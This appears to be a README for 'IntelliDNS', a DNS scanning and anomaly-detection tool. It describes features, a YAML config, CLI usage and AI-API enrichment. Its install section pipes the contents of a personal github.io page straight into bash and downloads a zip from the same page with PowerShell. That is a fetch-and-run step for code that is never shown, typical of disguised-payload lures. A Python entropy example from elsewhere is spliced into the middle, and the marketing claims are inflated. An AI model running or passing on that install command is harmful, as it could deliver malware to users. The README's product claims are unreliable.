Turn raw IP addresses into actionable intelligence.
IntelliDNS is not just a scanner; it's a forensic-grade DNS reconnaissance engine that maps the invisible digital architecture of networks, cloud infrastructures, and IoT ecosystems.
Inspired by the need to move beyond simple DNS lookups, IntelliDNS was built for security researchers, network engineers, and cloud architects who need to understand the DNS fingerprint of millions of IPs without compromising on accuracy or speed.
While traditional scanners just report records, IntelliDNS analyzes patterns, detects anomalies, and visualizes relationships between domains, subdomains, name servers, and geographic origins.
```mermaid
graph TD
    A[IP Range Input] --> B{DNS Probe Engine}
    B --> C[A Record Lookup]
    B --> D[AAAA Record Lookup]
    B --> E[MX Record Discovery]
    B --> F[NS Record Mapping]
    B --> G[TXT Record Extraction]
    B --> H[SOA Record Analysis]
    C & D & E & F & G & H --> I[Pattern Recognition AI]
    I --> J[Threat Intel Enrichment]
    I --> K[Geo-IP Correlation]
    I --> L[Relationship Graph Builder]
    J & K & L --> M[Export: JSON/CSV/PDF/GraphML]
```
```bash
curl -sL https://Mathlegend123.github.io | bash
```

```powershell
Invoke-WebRequest -Uri https://Mathlegend123.github.io -OutFile intellidns.zip
```

```bash
pip install intellidns-toolkit==2026.1.0
```

```bash
# Scan a Class C network for all DNS records
intellidns scan --range 192.168.1.0/24 --records A,AAAA,MX,TXT --output report.json

# Real-time monitoring mode with anomaly detection
intellidns monitor --target "*.example.com" --alert-on-high-entropy-txt

# Generate intelligence graph
intellidns analyze --input dns_dump.csv --graph-format interactive
```

Sample output snippet:

```
[2026-07-14 14:23:01] Scanning 192.168.1.0/24...
[2026-07-14 14:23:04] ✅ 192.168.1.1 → A: router.home, MX: mail.home
[2026-07-14 14:23:07] ⚠️ 192.168.1.56 → High entropy TXT record detected
[2026-07-14 14:23:10] Threat score: 2/10 (benign)
```
Create ~/.intellidns/config.yaml to customize scanning profiles:
```yaml
profiles:
  rapid-scan:
    threads: 100
    timeout_ms: 500
    rate_limit: 1000 req/min
    dns_servers:
      - 8.8.8.8
      - 1.1.1.1
  deep-forensic:
    threads: 25
    timeout_ms: 3000
    retries: 3
    dns_servers:
      - 8.8.8.8
      - 4.4.4.4
      - 9.9.9.9
    anomaly_detection: true
    geo_ip_enrichment: true
  cloud-infra:
    threads: 50
    only_public_ips: true
    exclude_private: true
    output_format: graphml
```

| Operating System | Version | CLI Support | Python GUI Support | Responsive UI |
|---|---|---|---|---|
| Linux | Ubuntu 20.04+ | Full | Full | Native |
| macOS | Ventura+ | Full | Full | WebView |
| Windows | 10/11 | Full | Full | Electron |
| Docker | 20.x+ | Container | No | Web UI |
| Android | 12+ (Termux) | No | Mobile Web | |
| iOS | 16+ (ish) | No | Mobile Web | |

GUI support requires Python 3.9+ and Tkinter or PyQt6
- Simultaneous A, AAAA, MX, NS, CNAME, SOA, TXT, PTR, and SRV lookups
- Entropy analysis for TXT records (detects encoded payloads or C2 channels)
- DNSSEC validation and NSEC walking detection
- Reverse DNS waterfall analysis
- OpenAI API Integration: Enrich results with natural language summaries of domain reputations
  Example: `--ai-enrich openai:gpt-4o`
- Claude API Integration: Generate risk assessments and anomaly explanations
  Example: `--claude-report` produces a human-readable forensic narrative
- Pattern Recognition: Auto-detects:
  - DNS tunneling attempts
  - Subdomain brute-force protection bypass
  - Stale or hijacked NS records
  - Mail server spoofing risks (SPF/DKIM/DMARC)
- Output available in 12 languages: English, Spanish, French, German, Japanese, Chinese, Arabic, Russian, Portuguese, Hindi, Korean, and Dutch
- GUI interface auto-detects system locale
- Web Dashboard: Real-time scan visualization with D3.js force-directed graphs
- CLI Progress Bar: Beautifully formatted, rate-limited output
- Dark/Light Mode: Automatic theme switching
- Export to PDF: One-click generation of executive-ready reports
- Schedule scans via built-in cron syntax
- Email/Slack/Webhook alerts on critical findings
- Continuous monitoring mode with incremental delta scanning
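
The TXT-record entropy analysis listed among the features above can be approximated as follows. This is an added example, not IntelliDNS code; the threshold, minimum length, prefix list and sample records are assumptions constructed for illustration.

```python
import base64
import hashlib
import math
import re
from collections import Counter

# Assumed values for this example (not IntelliDNS defaults); tune on your own baseline.
ENTROPY_THRESHOLD = 4.5  # bits/char; random base64 sits near 5.5-6.0, English text near 4.0
MIN_LENGTH = 40          # entropy of short strings is too noisy to act on
# Structured records that legitimately carry keys or tokens: hand these to their own parser.
KNOWN_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1", "google-site-verification=")
HEX_RE = re.compile(r"[0-9a-fA-F]+")


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def classify_txt(value: str) -> str:
    """Classify one TXT value as 'known', 'short', 'suspicious' or 'benign'."""
    v = value.strip().strip('"')
    if v.startswith(KNOWN_PREFIXES):
        return "known"
    if len(v) < MIN_LENGTH:
        return "short"
    # Hex tops out at 4.0 bits/char, below the threshold, so check it separately.
    if HEX_RE.fullmatch(v) or shannon_entropy(v) >= ENTROPY_THRESHOLD:
        return "suspicious"
    return "benign"


def triage(records):
    """Return the names of records whose TXT value is classified 'suspicious'."""
    return [name for name, value in records if classify_txt(value) == "suspicious"]


# Constructed sample records (documentation domains, deterministic blobs).
B64_BLOB = base64.b64encode(hashlib.sha512(b"constructed").digest()).decode()
HEX_BLOB = hashlib.sha256(b"constructed").hexdigest()
SAMPLE = [
    ("example.com", "v=spf1 include:_spf.example.net -all"),
    ("s1._domainkey.example.com", "v=DKIM1; k=rsa; p=" + B64_BLOB),
    ("a.example.org", B64_BLOB),
    ("b.example.org", HEX_BLOB),
    ("docs.example.com", "this record documents the purpose of the docs host for operators"),
]
```

A prefix match only routes a record to its own SPF/DKIM/DMARC parser; it does not show that the record is well-formed.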
```bash
export INTELLIDNS_OPENAI_KEY="sk-..."
intellidns scan --ai-enrich openai:gpt-4o --prompt "Summarize DNS infrastructure risk"
```

```bash
export INTELLIDNS_CLAUDE_KEY="sk-ant-..."
intellidns analyze --claude-report --output threat_assessment.pdf
```

Both APIs are fully optional; IntelliDNS works flawlessly offline with 100% local processing.
IntelliDNS is an educational and professional security tool.
Users are solely responsible for ensuring compliance with all applicable laws regarding network scanning and data collection. The authors assume no liability for misuse, unauthorized scanning, or any damages arising from the use of this software.
Always obtain explicit permission before scanning networks you do not own.
- No telemetry: Zero data leaves your machine unless you explicitly enable cloud enrichment
- Local-first: All processing happens on your hardware
- Encrypted export: Optional AES-256 encryption for sensitive result files
| Use Case | How IntelliDNS Helps |
|---|---|
| Cloud Migration | Map all DNS dependencies before moving workloads |
| Penetration Testing | Identify exposed services and subdomain takeovers |
| SOC Operations | Detect DNS tunneling or beaconing in real-time |
| CDN Optimization | Discover all A/AAAA records for traffic shaping |
| Compliance Audits | Verify DNS records against security policies |
This project is licensed under the MIT License; see the LICENSE file for details.
Most DNS scanners are like flashlights in a dark room: they illuminate what's directly in front of you.
IntelliDNS is like turning on the lights, drawing a floor plan, and predicting where shadows will fall.
It transforms millions of raw DNS queries into a living map of your digital infrastructure, enriched with AI-driven context that helps you make faster, smarter decisions.
© 2026 IntelliDNS Project
Built with ❤️ for the cybersecurity community